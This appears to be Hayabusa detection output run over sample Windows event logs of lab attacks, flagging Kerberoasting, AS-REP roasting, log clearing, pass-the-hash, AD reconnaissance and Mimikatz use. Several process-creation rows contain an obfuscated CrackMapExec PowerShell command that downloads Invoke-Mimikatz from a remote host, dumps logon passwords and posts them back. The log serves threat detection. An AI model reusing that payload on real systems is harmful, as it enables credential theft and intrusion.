2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer:  | IP Addr: 192.168.1.2 | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer:  | IP Addr: 192.168.1.2 | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: 192.168.1.100 | LID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer:  | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer:  | IP Addr: 192.168.1.200 | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | LID: 0x36df3b7 | PID: 4436 | PGUID: 9828DA72-683B-608C-A50C-000000000C00 | Hash: SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter Substring,,rules/sigma/process_creation/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
